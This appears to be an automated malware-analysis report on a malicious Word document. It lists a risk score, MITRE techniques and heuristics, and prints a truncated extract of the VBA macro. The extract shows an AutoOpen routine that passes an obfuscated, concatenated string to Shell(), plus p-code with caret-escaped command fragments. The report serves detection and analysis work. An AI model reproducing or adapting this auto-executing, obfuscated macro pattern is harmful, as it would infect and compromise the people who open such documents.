MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, which is a common technique for downloading and executing further malicious content. The obfuscated nature of the command string suggests an attempt to evade detection.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30719 bytes |
SHA-256: 5c85c3b59651e5c1fffb27343811907d747cefd1901788fd7131491a8d67974c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QWAVCmbWUGi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jIOiqzzJmz" Sub AutoOpen() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error FBQcU * 60419 * bQntPO / ODzWO Error GoAzh * kwWsUq Error 96578 * wrzKr / 70060 * KQitA awOdviwZVWk = Shell(ChrW(10 + 2 + 12 + 2 + 41) + zrwRkijVntwt + ENBSYUbJQbWRv + qInVro + DOTEiQSoc + iTTisQuKawY + BrOiAHAi + DsJFIMC + WmbRTDZfDuD + AzQUmXzlUvmSLn, 875529044 - 875529044) Error wYVdjJ * LBfXN / 87405 * qpwIQ Error 20640 / bUVEi * 84663 * solUDW Error vSiWq / HXcwm End Sub ' Processing file: /opt/analyzer/scan_staging/03fbcd7780264042a856f7198350edf1.bin ' =============================================================================== ' Module streams: ' Macros/VBA/QWAVCmbWUGi - 1109 bytes ' Macros/VBA/vlIoOfNZCBLsbf - 17225 bytes ' Line #0: ' FuncDefn (Function qInVro()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Line #3: ' OnError (Resume Next) ' Line #4: ' Line #5: ' OnError (Resume Next) ' Line #6: ' Line #7: ' OnError (Resume Next) ' Line #8: ' Ld jVpRhX ' Ld nUcdsa ' Div ' Error ' Line #9: ' LitDI2 0x1C77 ' LitDI2 0x4FA7 ' Div ' Error ' Line #10: ' LitStr 0x0005 "Md /" ' LitStr 0x0004 "v/r " ' Add ' LitDI2 0x0000 ' LitDI2 0x0004 ' Add ' LitDI2 0x0003 ' Add ' LitDI2 0x0001 ' Add ' LitDI2 0x001A ' Add ' ArgsLd Chr 0x0001 ' Add ' LitStr 0x0002 " ^" ' Add ' LitStr 0x0004 "sE^T" ' Add ' LitStr 0x0001 " " ' Add ' LitStr 0x0002 "^ " ' Add ' LitStr 0x0006 "^h^q^x" ' Add ' LitStr 0x0003 "==^" ' Add ' LitStr 0x0002 "=^" ' Add ' LitStr 0x0001 "A" ' Add ' LitStr 0x0006 "^Ag^AA" ' Add ' LitStr 0x0004 "^I^A" ' Add ' St BZMwQiNFZWq ' Line #11: ' Ld tMCaD ' LitDI4 0xE6D5 0x0000 ' Mul ' LitDI2 0x3A5A ' Mul ' Ld QQGqqL ' Mul ' Error ' Line #12: ' Ld OijvB ' LitDI2 0x1CB2 ' Div ' Ld sLjQt ' Mul ' Ld pvvMZi ' Mul ' Error ' Line #13: ' LitDI4 0xDECF 0x0000 ' Ld zfPzGA ' Mul ' LitDI2 0x354C ' Div ' Ld zihijA ' Mul ' Error ' Line #14: ' LitDI4 0x3529 0x0001 ' LitDI4 0x81F4 0x0001 ' Mul ' LitDI4 0x9F6C 0x0000 ' Div ' Ld iVwZw ' Div ' Error ' Line #15: ' LitStr 0x0005 "ACA^g" ' LitStr 0x0004 "^AA^" ' Add ' LitStr 0x0002 "IA" ' Add ' LitStr 0x0006 "AC^A^g" ' Add ' LitStr 0x0006 "^AAIAA" ' Add ' LitStr 0x0004 "C^A^" ' Add ' LitStr 0x0006 "gA^A^I" ' Add ' LitStr 0x0007 "^A^ACAg" ' Add ' LitStr 0x0003 "^AA" ' Add ' St zDSBClTWPi ' Line #16: ' Ld cmLup ' Ld AaBkP ' Div ' Error ' Line #17: ' LitDI2 0x7F29 ' Ld CzdWR ' Div ' LitDI4 0x055A 0x0001 ' Mul ' LitDI4 0xD62A 0x0000 ' Mul ' Error ' Line #18: ' Ld rqFwI ' Ld GQpMjw ' Div ' Ld zAKQzX ' Mul ' Ld kWiHjf ' Mul ' Error ' Line #19: ' LitDI4 0xBBA9 0x0000 ' LitDI4 0xB242 0x0000 ' Div ' Error ' Line #20: ' LitStr 0x0003 "^I^" ' LitStr 0x0006 "AACAgA" ' Add ' LitStr 0x0002 "^A" ' Add ' LitStr 0x0002 "I^" ' Add ' LitStr 0x0007 "A^0^H^A" ' Add ' St jcjuv ' Line #21: ' Ld mBImQ ' LitDI4 0x8D6B 0x0000 ' Mul ' LitDI4 0xC5D7 0x0000 ' Div ' Ld tnnacw ' Div ' Error ' Line #22: ' LitStr 0x0003 "9Bw" ' LitStr 0x0006 "^e^Ag^" ' Add ' LitStr 0x0004 "G^Aj" ' Add ' LitStr 0x0005 "BA^dA" ' Add ' LitStr 0x0001 "E" ' Add ' LitStr 0x0003 "GA^" ' Add ' LitStr 0x0001 "j" ' Add ' LitStr 0x0003 "BQf" ' Add ' LitStr 0x0002 "^A" ' Add ' LitStr 0x0007 "s^D^ArB" ' Add ' LitStr 0x0007 "^QYA^UG" ' Add ' LitStr 0x0005 "^Ay^B" ' Add ' St WdMbk ' Line #23: ' LitDI4 0x1B58 0x0001 ' Ld jZIUW ' Mul ' LitDI2 0x44BE ' Mul ' Ld joiRDz ' Div ' Error ' Line #24: ' LitDI4 0x5E22 0x0001 ' Ld XupwjI ' Mul ' Error ' Line # ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.